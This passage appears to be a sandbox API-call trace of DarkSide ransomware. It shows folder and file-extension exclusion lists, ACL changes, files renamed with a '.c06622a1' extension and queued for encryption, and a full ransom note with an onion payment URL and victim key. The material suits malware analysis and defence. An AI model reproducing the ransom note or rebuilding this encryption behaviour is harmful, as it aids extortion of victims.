BaseAddress=0x3272078) returned 1 [0160.319] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.320] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d2f2ac0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8d2f2ac0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d2f2ac0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0160.320] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0160.320] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cb29640, ftCreationTime.dwHighDateTime=0x1d5e13a, ftLastAccessTime.dwLowDateTime=0x3b648560, ftLastAccessTime.dwHighDateTime=0x1d5d7df, ftLastWriteTime.dwLowDateTime=0x3b648560, ftLastWriteTime.dwHighDateTime=0x1d5d7df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vrm8P aH", cAlternateFileName="VRM8PA~1")) returned 1 [0160.320] _wcsicmp (_Str1="$recycle.bin", _Str2="Vrm8P aH") returned -82 [0160.320] wcslen (_String="$recycle.bin") returned 0xc [0160.320] _wcsicmp (_Str1="config.msi", _Str2="Vrm8P aH") returned -19 [0160.320] wcslen (_String="config.msi") returned 0xa [0160.320] _wcsicmp (_Str1="$windows.~bt", _Str2="Vrm8P aH") returned -82 [0160.320] wcslen (_String="$windows.~bt") returned 0xc [0160.320] _wcsicmp (_Str1="$windows.~ws", _Str2="Vrm8P aH") returned -82 [0160.320] wcslen (_String="$windows.~ws") returned 0xc [0160.320] _wcsicmp (_Str1="windows", _Str2="Vrm8P aH") returned 1 [0160.320] wcslen (_String="windows") returned 0x7 [0160.320] _wcsicmp (_Str1="appdata", _Str2="Vrm8P aH") returned -21 [0160.320] wcslen (_String="appdata") returned 0x7 [0160.320] _wcsicmp (_Str1="application data", _Str2="Vrm8P aH") returned -21 [0160.320] wcslen (_String="application data") returned 0x10 [0160.320] _wcsicmp (_Str1="boot", _Str2="Vrm8P aH") returned -20 [0160.321] wcslen (_String="boot") returned 0x4 [0160.321] _wcsicmp (_Str1="google", _Str2="Vrm8P aH") returned -15 [0160.321] wcslen (_String="google") returned 0x6 [0160.321] _wcsicmp (_Str1="mozilla", _Str2="Vrm8P aH") returned -9 [0160.321] wcslen (_String="mozilla") returned 0x7 [0160.321] _wcsicmp (_Str1="program files", _Str2="Vrm8P aH") returned -6 [0160.321] wcslen (_String="program files") returned 0xd [0160.321] _wcsicmp (_Str1="program files (x86)", _Str2="Vrm8P aH") returned -6 [0160.321] wcslen (_String="program files (x86)") returned 0x13 [0160.321] _wcsicmp (_Str1="programdata", _Str2="Vrm8P aH") returned -6 [0160.321] wcslen (_String="programdata") returned 0xb [0160.321] _wcsicmp (_Str1="system volume information", _Str2="Vrm8P aH") returned -3 [0160.321] wcslen (_String="system volume information") returned 0x19 [0160.321] _wcsicmp (_Str1="tor browser", _Str2="Vrm8P aH") returned -2 [0160.321] wcslen (_String="tor browser") returned 0xb [0160.321] _wcsicmp (_Str1="windows.old", _Str2="Vrm8P aH") returned 1 [0160.321] wcslen (_String="windows.old") returned 0xb [0160.321] _wcsicmp (_Str1="intel", _Str2="Vrm8P aH") returned -13 [0160.321] wcslen (_String="intel") returned 0x5 [0160.321] _wcsicmp (_Str1="msocache", _Str2="Vrm8P aH") returned -9 [0160.321] wcslen (_String="msocache") returned 0x8 [0160.321] _wcsicmp (_Str1="perflogs", _Str2="Vrm8P aH") returned -6 [0160.321] wcslen (_String="perflogs") returned 0x8 [0160.321] _wcsicmp (_Str1="x64dbg", _Str2="Vrm8P aH") returned 2 [0160.321] wcslen (_String="x64dbg") returned 0x6 [0160.321] _wcsicmp (_Str1="public", _Str2="Vrm8P aH") returned -6 [0160.322] wcslen (_String="public") returned 0x6 [0160.322] _wcsicmp (_Str1="all users", _Str2="Vrm8P aH") returned -21 [0160.322] wcslen (_String="all users") returned 0x9 [0160.322] _wcsicmp (_Str1="default", _Str2="Vrm8P aH") returned -18 [0160.322] wcslen (_String="default") returned 0x7 [0160.322] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\*" [0160.322] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\*") returned 0x45 [0160.322] wcscpy (in: _Dest=0x32500f0, _Source="Vrm8P aH" | out: _Dest="Vrm8P aH") returned="Vrm8P aH" [0160.322] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.322] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.324] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" [0160.324] GetNamedSecurityInfoW () returned 0x0 [0160.324] SetEntriesInAclW () returned 0x0 [0160.324] SetNamedSecurityInfoW () returned 0x0 [0160.327] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22bca8) returned 1 [0160.327] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e3ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0160.327] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah")) returned 1 [0160.327] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0160.327] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0160.328] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e3bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e3bc*=0x7ca, lpOverlapped=0x0) returned 1 [0160.329] CloseHandle (hObject=0x1bc) returned 1 [0160.329] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0160.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah")) returned 0x10 [0160.329] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\") returned="" [0160.329] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\") returned 0x4d [0160.330] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\*", fInfoLevelId=0x0, lpFindFileData=0x32e61c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e61c) returned 0x154208 [0160.330] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cb29640, ftCreationTime.dwHighDateTime=0x1d5e13a, ftLastAccessTime.dwLowDateTime=0x8d4235c0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d4235c0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.330] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6564e30, ftCreationTime.dwHighDateTime=0x1d5decf, ftLastAccessTime.dwLowDateTime=0xb8f70eb0, ftLastAccessTime.dwHighDateTime=0x1d5d7e1, ftLastWriteTime.dwLowDateTime=0xb8f70eb0, ftLastWriteTime.dwHighDateTime=0x1d5d7e1, nFileSizeHigh=0x0, nFileSizeLow=0x53e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="aktUJZSyoBlhczRPPcSp.mp3", cAlternateFileName="AKTUJZ~1.MP3")) returned 1 [0160.330] _wcsicmp (_Str1="aktUJZSyoBlhczRPPcSp.mp3", _Str2="README.c06622a1.TXT") returned -17 [0160.330] wcsstr (_Str="aktUJZSyoBlhczRPPcSp.mp3", _SubStr="README") returned 0x0 [0160.330] _wcsicmp (_Str1="autorun.inf", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 10 [0160.330] wcslen (_String="autorun.inf") returned 0xb [0160.330] _wcsicmp (_Str1="boot.ini", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 1 [0160.330] wcslen (_String="boot.ini") returned 0x8 [0160.330] _wcsicmp (_Str1="bootfont.bin", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 1 [0160.330] wcslen (_String="bootfont.bin") returned 0xc [0160.330] _wcsicmp (_Str1="bootsect.bak", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 1 [0160.330] wcslen (_String="bootsect.bak") returned 0xc [0160.331] _wcsicmp (_Str1="desktop.ini", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 3 [0160.331] wcslen (_String="desktop.ini") returned 0xb [0160.331] _wcsicmp (_Str1="iconcache.db", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 8 [0160.331] wcslen (_String="iconcache.db") returned 0xc [0160.331] _wcsicmp (_Str1="ntldr", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 13 [0160.331] wcslen (_String="ntldr") returned 0x5 [0160.331] _wcsicmp (_Str1="ntuser.dat", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 13 [0160.331] wcslen (_String="ntuser.dat") returned 0xa [0160.331] _wcsicmp (_Str1="ntuser.dat.log", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 13 [0160.331] wcslen (_String="ntuser.dat.log") returned 0xe [0160.331] _wcsicmp (_Str1="ntuser.ini", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 13 [0160.331] wcslen (_String="ntuser.ini") returned 0xa [0160.331] _wcsicmp (_Str1="thumbs.db", _Str2="aktUJZSyoBlhczRPPcSp.mp3") returned 19 [0160.331] wcslen (_String="thumbs.db") returned 0x9 [0160.331] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.331] wcslen (_String="386") returned 0x3 [0160.331] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.331] wcslen (_String="adv") returned 0x3 [0160.331] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.331] wcslen (_String="ani") returned 0x3 [0160.331] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.331] wcslen (_String="bat") returned 0x3 [0160.332] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.332] wcslen (_String="bin") returned 0x3 [0160.332] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.332] wcslen (_String="cab") returned 0x3 [0160.332] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.332] wcslen (_String="cmd") returned 0x3 [0160.332] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.332] wcslen (_String="com") returned 0x3 [0160.332] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.332] wcslen (_String="cpl") returned 0x3 [0160.332] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.332] wcslen (_String="cur") returned 0x3 [0160.332] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.332] wcslen (_String="deskthemepack") returned 0xd [0160.332] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.332] wcslen (_String="diagcab") returned 0x7 [0160.332] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.332] wcslen (_String="diagcfg") returned 0x7 [0160.332] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.332] wcslen (_String="diagpkg") returned 0x7 [0160.332] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.332] wcslen (_String="dll") returned 0x3 [0160.332] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.332] wcslen (_String="drv") returned 0x3 [0160.332] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.332] wcslen (_String="exe") returned 0x3 [0160.333] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.333] wcslen (_String="hlp") returned 0x3 [0160.333] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.333] wcslen (_String="icl") returned 0x3 [0160.333] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.333] wcslen (_String="icns") returned 0x4 [0160.333] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.333] wcslen (_String="ico") returned 0x3 [0160.333] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.333] wcslen (_String="ics") returned 0x3 [0160.333] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.333] wcslen (_String="idx") returned 0x3 [0160.333] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.333] wcslen (_String="ldf") returned 0x3 [0160.333] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0160.333] wcslen (_String="lnk") returned 0x3 [0160.333] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.333] wcslen (_String="mod") returned 0x3 [0160.333] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.333] wcslen (_String="mpa") returned 0x3 [0160.333] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.333] wcslen (_String="msc") returned 0x3 [0160.333] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.333] wcslen (_String="msp") returned 0x3 [0160.333] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.333] wcslen (_String="msstyles") returned 0x8 [0160.333] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.334] wcslen (_String="msu") returned 0x3 [0160.334] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.334] wcslen (_String="nls") returned 0x3 [0160.334] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.334] wcslen (_String="nomedia") returned 0x7 [0160.334] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.334] wcslen (_String="ocx") returned 0x3 [0160.334] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.334] wcslen (_String="prf") returned 0x3 [0160.334] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.334] wcslen (_String="ps1") returned 0x3 [0160.334] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.334] wcslen (_String="rom") returned 0x3 [0160.334] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.334] wcslen (_String="rtp") returned 0x3 [0160.334] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.334] wcslen (_String="scr") returned 0x3 [0160.334] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.334] wcslen (_String="shs") returned 0x3 [0160.334] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.334] wcslen (_String="spl") returned 0x3 [0160.334] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.334] wcslen (_String="sys") returned 0x3 [0160.334] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.334] wcslen (_String="theme") returned 0x5 [0160.334] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.335] wcslen (_String="themepack") returned 0x9 [0160.335] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.335] wcslen (_String="wpx") returned 0x3 [0160.335] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.335] wcslen (_String="lock") returned 0x4 [0160.335] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.335] wcslen (_String="key") returned 0x3 [0160.335] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.335] wcslen (_String="hta") returned 0x3 [0160.335] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.335] wcslen (_String="msi") returned 0x3 [0160.335] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.335] wcslen (_String="pdb") returned 0x3 [0160.335] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.335] wcslen (_String="sqlite") returned 0x6 [0160.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah")) returned 0x10 [0160.335] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0160.335] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" [0160.335] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH") returned 0x4c [0160.335] wcscpy (in: _Dest=0x32a212a, _Source="aktUJZSyoBlhczRPPcSp.mp3" | out: _Dest="aktUJZSyoBlhczRPPcSp.mp3") returned="aktUJZSyoBlhczRPPcSp.mp3" [0160.335] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\aktUJZSyoBlhczRPPcSp.mp3", dwFileAttributes=0x80) returned 1 [0160.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\aktUJZSyoBlhczRPPcSp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\aktujzsyoblhczrppcsp.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0160.336] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.336] ReadFile (in: hFile=0x1dc, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0160.337] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0xaf8fff70 [0160.337] RtlComputeCrc32 (PartialCrc=0xff70, Buffer=0x32e4a4, Length=0x80) returned 0xcf954ea4 [0160.337] RtlComputeCrc32 (PartialCrc=0x4ea4, Buffer=0x32e4a4, Length=0x80) returned 0xadd298 [0160.337] RtlComputeCrc32 (PartialCrc=0xd298, Buffer=0x32e4a4, Length=0x80) returned 0x87ccd592 [0160.337] RtlComputeCrc32 (PartialCrc=0xd592, Buffer=0x32e4a4, Length=0x80) returned 0xf27168fb [0160.337] CloseHandle (hObject=0x1dc) returned 1 [0160.337] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0160.337] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\aktUJZSyoBlhczRPPcSp.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\aktUJZSyoBlhczRPPcSp.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\aktUJZSyoBlhczRPPcSp.mp3" [0160.337] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\aktUJZSyoBlhczRPPcSp.mp3") returned 0x65 [0160.337] wcscpy (in: _Dest=0x32b2162, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.337] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\aktUJZSyoBlhczRPPcSp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\aktujzsyoblhczrppcsp.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\aktUJZSyoBlhczRPPcSp.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\aktujzsyoblhczrppcsp.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\aktUJZSyoBlhczRPPcSp.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\aktujzsyoblhczrppcsp.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1dc [0160.339] CreateIoCompletionPort (FileHandle=0x1dc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.339] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3bd0020 [0160.349] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5dc11fe [0160.349] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x46c91b6e [0160.349] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x33ba7046 [0160.349] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2877221c [0160.349] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50d2fbec [0160.349] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x768e0cf6 [0160.349] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1316c35f [0160.349] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7db7fd71 [0160.352] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3bd0094, Length=0x80) returned 0x1a09bb8e [0160.352] RtlComputeCrc32 (PartialCrc=0xbb8e, Buffer=0x3bd0094, Length=0x80) returned 0xd997f3eb [0160.352] RtlComputeCrc32 (PartialCrc=0xf3eb, Buffer=0x3bd0094, Length=0x80) returned 0x247f83b2 [0160.352] RtlComputeCrc32 (PartialCrc=0x83b2, Buffer=0x3bd0094, Length=0x80) returned 0x9c3d53fc [0160.352] RtlComputeCrc32 (PartialCrc=0x53fc, Buffer=0x3bd0094, Length=0x80) returned 0xf10ab29f [0160.353] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3bd0020) returned 1 [0160.353] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0160.353] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0160.353] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b51df40, ftCreationTime.dwHighDateTime=0x1d5e5aa, 